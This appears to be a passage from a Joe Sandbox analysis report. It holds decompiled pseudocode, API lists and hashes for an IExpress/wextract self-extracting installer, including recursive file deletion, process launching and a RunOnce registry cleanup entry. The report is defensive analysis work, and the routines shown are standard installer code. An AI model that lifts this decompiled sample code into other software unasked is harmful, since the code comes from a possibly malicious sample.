Not Executed

C-Code - Quality: 86%

			E00932390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x938004; // 0x911e09f9
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00936CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00931680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E009316B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00931680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E009316B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E009316B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0093658A( &_v280, 0x104, 0x931140);
								E00932390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00932398
0x0093239e
0x009323a3
0x009323a5
0x009323ae
0x009323b3
0x009324cb
0x009324d2
0x009324d3
0x009324d4
0x009324df
0x009323c2
0x009323d1
0x009323db
0x009323e4
0x009323f6
0x009323fc
0x00932401
0x00000000
0x00000000
0x00000000
0x00000000
0x00932407
0x00932407
0x00932408
0x00932411
0x0093241f
0x0093247a
0x00932483
0x00932495
0x009324a3
0x00932421
0x0093242f
0x00932453
0x0093245d
0x00932466
0x00932472
0x00932472
0x0093242f
0x009324af
0x009324b5
0x009324be
0x009324c5
0x00000000
0x009324c5

APIs

FindFirstFileA.KERNELBASE(?,00938A3A,009311F4,00938A3A,00000000,?,?), ref: 009323F6
lstrcmpA.KERNEL32(?,009311F8), ref: 00932427
lstrcmpA.KERNEL32(?,009311FC), ref: 0093243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00932495
DeleteFileA.KERNEL32(?), ref: 009324A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 009324AF
FindClose.KERNELBASE(00000000), ref: 009324BE
RemoveDirectoryA.KERNELBASE(00938A3A), ref: 009324C5

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: b8b450565f2f302d7bb8fc8d268677ba5f6daf902439647a1c08b9e23c8c4d82
Instruction ID: 0deadaeb7d8e46c5dab29c50aa140775f068f538c8d5715a5486615dcb8976d7
Opcode Fuzzy Hash: b8b450565f2f302d7bb8fc8d268677ba5f6daf902439647a1c08b9e23c8c4d82
Instruction Fuzzy Hash: 55316431618740ABC320DBA4DC8DBEB73ECABC5315F04492DB595861A0EB74D949DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00933FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00933FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x938004; // 0x911e09f9
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00936CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x939124 = E00936285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E009344B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x938a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x939a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x939a2c = _t44;
						}
					}
				}
				E0093411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x939a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00933fef
0x00933ffa
0x00934001
0x00934008
0x0093400a
0x0093400b
0x00934010
0x0093410a
0x0093411a
0x0093411a
0x0093401c
0x0093401d
0x0093401e
0x0093401f
0x00934033
0x0093403b
0x009340ca
0x009340e9
0x009340f8
0x00934101
0x00934106
0x00934106
0x00934108
0x00934108
0x00000000
0x00934108
0x00934049
0x0093405c
0x00934062
0x00934068
0x0093406e
0x00934070
0x00934077
0x0093407f
0x00934089
0x0093408b
0x0093408b
0x00934089
0x00934077
0x00934091
0x0093409c
0x009340a8
0x009340b8
0x00000000
0x009340c2
0x00000000
0x009340c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00934033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00934049
GetExitCodeProcess.KERNELBASE ref: 0093405C
CloseHandle.KERNEL32(?), ref: 0093409C
CloseHandle.KERNEL32(?), ref: 009340A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 009340DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 009340E9

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: b6faf3645fb88f423193ad5be6469403d6c39bbb0c904c6b2fd3e42e7ec906b6
Instruction ID: 501d196faafd9cf0043eedab86540573c1430cb611a364ea7bd13d5bb0d8f0de
Opcode Fuzzy Hash: b6faf3645fb88f423193ad5be6469403d6c39bbb0c904c6b2fd3e42e7ec906b6
Instruction Fuzzy Hash: 5631E131658208BBEB209FA5DC4CFAB777CEBE5710F1101A9F685E21A0CA709D85DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00932BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00932BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x93a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x939124 = 0;
				if(E00932CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00932F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E009352B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x938a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x939a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00931F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x938588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x939124; // 0x0
				return _t7;
			}

0x00932c03
0x00932c0d
0x00932c18
0x00932c20
0x00932c2e
0x00932c32
0x00932c36
0x00932c3d
0x00932c43
0x00932c45
0x00932c47
0x00932c49
0x00932c4e
0x00932c4e
0x00932c47
0x00932c32
0x00932c20
0x00932c50
0x00932c54
0x00932c57
0x00932c64
0x00932c66
0x00932c6b
0x00932c6d
0x00932c74
0x00932c76
0x00932c7c
0x00932c7e
0x00932c87
0x00932c89
0x00932c89
0x00932c87
0x00932c7c
0x00932c74
0x00932c8e
0x00932c95
0x00932c98
0x00932c98
0x00932c9e
0x00932ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00936BB0,00930000,00000000,00000002,0000000A), ref: 00932C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00936BB0,00930000,00000000,00000002,0000000A), ref: 00932C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00932C28
CloseHandle.KERNEL32(00000000,?,?,00936BB0,00930000,00000000,00000002,0000000A), ref: 00932C98

Strings

HeapSetInformation, xrefs: 00932C22
Kernel32.dll, xrefs: 00932C13

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 090644d1c9d1eb80f25eae96c8d448ce9a984fc18dfacb3e2b624c0f202d02ce
Instruction ID: c3826d0b850f2592dd9c5a96f22249ed0995612a9645c67fe904a48378b2653d
Opcode Fuzzy Hash: 090644d1c9d1eb80f25eae96c8d448ce9a984fc18dfacb3e2b624c0f202d02ce
Instruction Fuzzy Hash: 331104312283056BD7206BB6AC88B6F37ADDB88394F141055F9D0E32A0DA71DC01EEA2

Uniqueness

Uniqueness Score: -1.00%

Function 00936F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00936F40() {

				SetUnhandledExceptionFilter(E00936EF0); // executed
				return 0;
			}

0x00936f45
0x00936f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00936F45

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d1ee60acc474935980a3888529cd8016ad10d8968b07c4ca679ff2b5a12bc2ba
Instruction ID: f3bfd9d8ce6db22bca153f933756b892cda2dca1b62e5b2fca0c047c4b8020b2
Opcode Fuzzy Hash: d1ee60acc474935980a3888529cd8016ad10d8968b07c4ca679ff2b5a12bc2ba
Instruction Fuzzy Hash: AF9002642691005796201BB49D1D41575919A8D607F829460A051C8494DB6144546D12

Uniqueness

Uniqueness Score: -1.00%

Function 0093202A Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0093202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				char _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				char _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x938004; // 0x911e09f9
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_push( &_v536);
				_push( &_v532);
				_push(0);
				_push(0x2001f);
				_t36 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0); // executed
				if(_t36 != 0) {
					L24:
					return E00936CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0093171E(0x938530, 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					if(RegQueryValueExA(_v532, 0x938530, 0, 0, 0,  &_v540) != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0093658A( &_v528, _t84, "advpack.dll");
					_t84 = LoadLibraryA( &_v528);
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x939a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x9391e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x9391e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x9391e5);
						if(_t90 != 0) {
							 *0x938580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
							E0093171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, 0x938530, 0, 1, _t90, _t24);
							RegCloseKey(_v532);
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E009344B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84);
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0093658A( &_v268, 0x104, 0x931140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x938530 = _t66;
				goto L23;
			}

0x0093202a
0x00932035
0x0093203c
0x00932041
0x00932050
0x0093205f
0x00932064
0x0093206f
0x00932071
0x00932078
0x00932079
0x0093207a
0x0093208c
0x00932094
0x00932257
0x00932266
0x00932266
0x0093209a
0x0093209b
0x0093209d
0x009320aa
0x009320af
0x009320d1
0x00000000
0x00000000
0x009320d3
0x009320da
0x00000000
0x00000000
0x00000000
0x009320da
0x009320e2
0x00932103
0x0093210e
0x00932116
0x00932128
0x0093212c
0x00932179
0x00932194
0x009321de
0x009321e4
0x00932256
0x00932256
0x00000000
0x00932256
0x00932196
0x00932196
0x0093219c
0x0093219f
0x0093219f
0x009321a1
0x009321a2
0x009321a6
0x009321a8
0x009321b0
0x009321b0
0x009321b2
0x009321b3
0x009321bc
0x009321c7
0x009321cb
0x009321f1
0x009321f6
0x009321fd
0x009321ff
0x009321ff
0x00932204
0x00932213
0x00932218
0x0093221d
0x0093221d
0x00932220
0x00932220
0x00932222
0x00932223
0x00932229
0x0093223d
0x00932249
0x00932250
0x00000000
0x00932250
0x009321d2
0x009321d9
0x00000000
0x009321d9
0x0093213a
0x00932141
0x00932144
0x0093214c
0x00000000
0x00000000
0x00932163
0x00932172
0x00932172
0x00000000
0x00932163
0x009320ea
0x009320f0
0x00000000

APIs

memset.MSVCRT ref: 00932050
memset.MSVCRT ref: 0093205F
RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0093208C

Part of subcall function 0093171E: _vsnprintf.MSVCRT ref: 00931750

RegQueryValueExA.ADVAPI32(?,00938530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009320C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009320EA
GetSystemDirectoryA.KERNEL32 ref: 00932103
LoadLibraryA.KERNEL32(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00932122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00932134
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00932144
GetSystemDirectoryA.KERNEL32 ref: 0093215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0093218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009321C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009321E4
RegSetValueExA.ADVAPI32(?,00938530,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0093223D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00932249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00932250

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00932082
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 009321F6
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 009321A8, 00932204
DelNodeRunDLL32, xrefs: 0093212E
wextract_cleanup%d, xrefs: 0093209E
advpack.dll, xrefs: 00932109
%s /D:%s, xrefs: 009321FF, 00932210

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocFileLoadModuleNameOpenProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d
API String ID: 3861571478-468490929
Opcode ID: 2a4c4a26643a67bff3107ace2abe7f2e07fd59b25a542f8ee4c418bd5d548258
Instruction ID: 1f0d65a051b7bc8dd6531c3d2e6157459fb0c29cc688495ff1d214f50e998a93
Opcode Fuzzy Hash: 2a4c4a26643a67bff3107ace2abe7f2e07fd59b25a542f8ee4c418bd5d548258
Instruction Fuzzy Hash: C0512671A18214ABDB249BA4DC49FFB777CEF91700F0041A8FA85E7150DAB19E49DF60

Uniqueness

Uniqueness Score: -1.00%

Function 009355A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E009355A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x938004; // 0x911e09f9
				_v8 = _t28 ^ _t110;
				_t2 = E0093468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0093468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x939a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x938b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x938a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00936517(_t82, 0x7d2, 0, E00933210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x939a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x9391e4;
									_t40 = GetTempPathA(0x104, 0x9391e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00931781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00936952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0093597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00932630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0093658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x9391e4;
																					E00931781(0x9391e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00935467(0x9391e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00932630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0093597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00935467(0x9391e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x9391e4;
											_t70 = E00932630(0, 0x9391e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x9391e4;
												_t71 = E00935467(0x9391e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0093597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x938b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00935467(0x938b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E009344B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E009344B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x939124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E009344B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x939124 = E00936285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00936CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x009355ab
0x009355b2
0x009355c9
0x009355d5
0x009355d9
0x00935600
0x00935605
0x0093560a
0x0093560c
0x00935638
0x00935641
0x00935643
0x00935645
0x00935645
0x0093564c
0x00935652
0x00935657
0x00935659
0x00935696
0x0093569c
0x0093589f
0x009358a7
0x009358ac
0x009358b3
0x009358b5
0x009356a2
0x009356a2
0x009356a8
0x00000000
0x009356ae
0x009356ae
0x009356b9
0x009356bf
0x009356c1
0x009356f3
0x009356f3
0x00935705
0x0093570a
0x00935711
0x00935717
0x00935724
0x00935726
0x00935729
0x00935730
0x00935737
0x0093573d
0x00935740
0x00000000
0x00000000
0x00000000
0x00000000
0x0093572b
0x0093572b
0x0093572e
0x00935742
0x00935742
0x00935745
